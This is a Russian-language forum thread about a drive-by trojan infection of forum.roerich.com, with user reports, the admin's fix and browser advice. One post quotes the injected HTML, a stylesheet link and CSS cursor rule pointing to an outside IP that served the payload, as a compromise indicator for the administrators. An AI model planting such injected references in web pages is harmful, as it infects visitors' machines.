Сайт forum.roerich.com инфицирован
 

Вчера в очередной раз зашёл на forum.roerich.com и подцепил html вирус m00.exe. Уязвимы почти все версии эксплорера (у меня v6.0.26). Блокировать вирус можно любой прогой вырезающей рекламу по ключевым словам (добавьте ключевое слово my.css).

Рекомендую администрации сайта обратить внимание на строчку html кода форума href="http://66.246.224.19/my.css" type="text/css" по которой подгружается троян body { cursor: url('http://66.246.224.19/my.ani');

Re: Сайт forum.roerich.com инфицирован
 

С форумом действительно что-то не так, уже второй день он у меня отображается какими-то другими цветами

Отображается другими цветами именно потому что все цвета и оформление прописываются в файле стилей (.css), ссылку на который вирус заменил на ссылку на инфицированный файл css подгружающийся с левого айпишника. В этом файле css вместо цветовых констант прописан код, который приводит к переполнению буфера эксплорера и установке на комп юзера трояна.

Чтобы устранить проблему достаточно на сервере заменить в php скриптах ссылку с инфицированного css на css который был до этого. Ну и надо поймать червя за хвост в автозагрузке дабы он снова не переписал php код :)

вы это... поменьше про всякие уязвимости в форумах пишите...
есть люди, которе намеренно ищут подобную информацию в практических целях, а при поиске случайно натыкаются на ваш форум...
вы сами их притягиваете.

Во множестве тем начальное сообщение отсутствует. Сложность открыть профиль с дальнейшим процессом и т.д.
Будут ли информировать участников о предринимающих действиях со стороны администратора, ведь данные имеются?
Если продлиться ситуация невединия, кто-то не может войти, кто-то не может нормально просмотреть, то по разным условиям разбегутся.
Может нужно сделать каникулы и отпуска :) , но для этого всё же следует оповестить участников, чтобы отдых не затянулся на долго :)

Мой Norton Antivirus выловил трояна "Trojan.Moo".
Игорь - необходимо СРОЧНО форум полечить :!:

САРВА МАНГАЛАМ! :)

Лишний повод воспользоваться альтернативными браузерами. Например, Mozilla Firefox.

Форум сейчас вылечил. Перевожу его на последнюю версию, где не должно быть подобных уязвимостей.

Игорь, спасибо :!:

Все-таки целесообразно было бы предупредить о троянских конях, это бы оценили форумчане, которые сейчас чистят машины, а некоторые и не знают, что с ними сейчас происходит. Сам долго не мог понять в чем дело, пока не обновил антивирусник.
Надо сделать выводы из сложившейся ситуации на будущее.
С Уважением, Sagittari

Советую по этому поводу http://myphpbb.com.ru/
Сам недавно обновлял с 2.0.11 до 2.0.13 по тамошним FAQ. Если изменять ручками, то останутся все уже добавленные прибамбасы.

финское правительство не советует использовать IE
 

http://net.compulenta.ru/52210/

Можно сказать и ширше: в течение более 10 лет я стараюсь как можно меньше использовать любые программы Microsoft и в результате за всё это время не страдал от вирусов.